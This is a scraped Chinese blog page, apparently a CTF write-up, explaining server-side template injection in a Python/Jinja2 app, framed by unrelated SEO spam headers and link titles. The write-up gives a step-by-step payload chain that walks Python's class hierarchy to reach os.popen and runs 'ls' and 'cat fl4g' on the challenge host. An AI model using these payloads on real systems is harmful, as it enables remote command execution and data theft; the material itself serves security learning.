当前位置: 首页 > news >正文

一元钱购买网站空间php 网站伪静态

一元钱购买网站空间,php 网站伪静态,网站模板织梦,搜索引擎网站怎么做这是题目#xff0c;从题目上看是一个python模板注入类型的题目。 首先测试是否存在模板注入漏洞#xff0c;构造http://61.147.171.105:57423/{{config}} 得到 说明存在模板注入漏洞#xff0c;继续注入 构造http://61.147.171.105:57423/{{‘’.class.mro}}: 得到 再构造… 这是题目从题目上看是一个python模板注入类型的题目。 首先测试是否存在模板注入漏洞构造http://61.147.171.105:57423/{{config}} 得到 说明存在模板注入漏洞继续注入 构造http://61.147.171.105:57423/{{‘’.class.mro}}: 得到 再构造http://61.147.171.105:57423/{{‘’.class.mro[2].subclasses()}}: 编写脚本找到类索引 text type type, type weakref, type weakcallableproxy, type weakproxy, type int, type basestring, type bytearray, type list, type NoneType, type NotImplementedType, type traceback, type super, type xrange, type dict, type set, type slice, type staticmethod, type complex, type float, type buffer, type long, type frozenset, type property, type memoryview, type tuple, type enumerate, type reversed, type code, type frame, type builtin_function_or_method, type instancemethod, type function, type classobj, type dictproxy, type generator, type getset_descriptor, type wrapper_descriptor, type instance, type ellipsis, type member_descriptor, type file, type PyCapsule, type cell, type callable-iterator, type iterator, type sys.long_info, type sys.float_info, type EncodingMap, type fieldnameiterator, type formatteriterator, type sys.version_info, type sys.flags, type exceptions.BaseException, type module, type imp.NullImporter, type zipimport.zipimporter, type posix.stat_result, type posix.statvfs_result, class warnings.WarningMessage, class warnings.catch_warnings, class _weakrefset._IterationGuard, class _weakrefset.WeakSet, class _abcoll.Hashable, type classmethod, class _abcoll.Iterable, class _abcoll.Sized, class _abcoll.Container, class _abcoll.Callable, type dict_keys, type dict_items, type dict_values, class site._Printernew_text text.split(,) index 0 for i in new_text:index 1 print(index - 1) #数组索引从0开始运行得到索引值为71 再构造http://61.147.171.105:57423/{{‘’.class.mro[2].subclasses()[71].init.globals[‘os’].popen(‘ls’).read()}} 得到 最后构造http://61.147.171.105:57423/{{‘’.class.mro[2].subclasses()[71].init.globals[‘os’].popen(‘cat fl4g’).read()}} 得到flag 总结本质上就是通过模板注入代码获取所需信息。 知识点 1.SSTIServer-Side Template Injection是一种发生在服务器端模板中的漏洞。当应用程序接受用户输入并将其直接传递到模板引擎中进行解析时如果未对用户输入进行充分的验证和过滤攻击者可以通过构造恶意的输入来注入模板代码导致服务器端模板引擎执行恶意代码。 SSTI漏洞利用基本流程 获取当前类 - 获取其object基类 - 获取所有子类 - 获取可执行shell命令的子类 - 获取可执行shell命令的方法 - 执行shell命令. SSTI漏洞原理 服务端接收攻击者的恶意输入以后未经任何处理就将其作为 Web 应用模板内容的一部分模板引擎在进行目标编译渲染的过程中执行了攻击者插入的可以破坏模板的语句从而达到攻击者的目的。 渲染函数在渲染的时候往往对用户输入的变量不做渲染即{{}}在Jinja2中作为变量包裹标识符Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{2*2}}会被解析成4。因此才有了现在的模板注入漏洞。往往变量我们使用{{恶意代码}}。正因为{{}}包裹的东西会被解析因此我们就可以实现类似于SQL注入的漏洞. 实际上就是我们传到后台的数据会被后台获取数据并执行。本质上是后台代码解析前端传过来的数据的时候没有进行处理导致我们用{{}}传进来的恶意命令被动态渲染从而产生了这样的问题。 class #返回type类型查看对象的类型 bases #返回tuple类型列出该类的基类 mro #返回tuple类型给出解析方法调用的顺序 subclasses() #返回内建方法builtin_function_or_method获取一个类的子类 globals #返回dict类型对函数进行操作获取当前空间下能使用的模块、方法、变量, init 类的初始化方法 popen函数是用来执行系统命令的
http://www.hkea.cn/news/14493731/

相关文章:

  • 免费的seo网站下载国外好的室内设计网站
  • 什么网站免费做简历模板微信公众号文章怎么导入wordpress
  • 西湖区网站建设石家庄智能模板建站
  • 平板购物网站建设wordpress写文章 字号
  • 重庆手机版建站系统信息如何用百度平台营销
  • 做网站的收费电脑上如何做课程视频网站
  • 小程序模板源码免费seo综合查询中的具体内容有哪些
  • 宜昌住房与城乡建设部网站24免费妇科在线咨询
  • jsp网站开发简单代码网店代运营网
  • 网站推广广告词wordpress阅读权限
  • 最大的免费网站建设网站建设与管理是什么意思
  • 有经验的中山网站建设全网网络营销系统
  • 网站建站业务企业登录官网
  • 网站服务器需要多大做素食香料哪个网站买
  • 网站开发厦门5条国内最新新闻
  • 网站建设相关做网站程序的步骤
  • 东莞外贸公司网站建设做蔬菜配送有什么网站可下载了解
  • 个人网站设计论文参考文献门户网站建设需求
  • 郑州做营销型网站公司开发一个网站多少钱?
  • 台州网站建设咨询薇上海建设工程交易中心网站
  • c c也能干大事网站开发苏州网站建设方式
  • 网站的动态效果php7 mysql wordpress
  • 网站开发用什么编辑语言好建设工程月评打分网站
  • 自建网站的步骤健身房网站的建设情况
  • 网站的回到顶部怎么做wordpress国内商城主题
  • 国内坚持做正品的网站筑成建设集团网站
  • 如何写一个可以做报价计算的网站具有品牌的广州做网站
  • 惠州建设工程造价管理协会网站做互联网项目怎么推广
  • 昆明平台网站开发微信营销的特点有哪些
  • wap网站制作动态wordpress缺少主题样式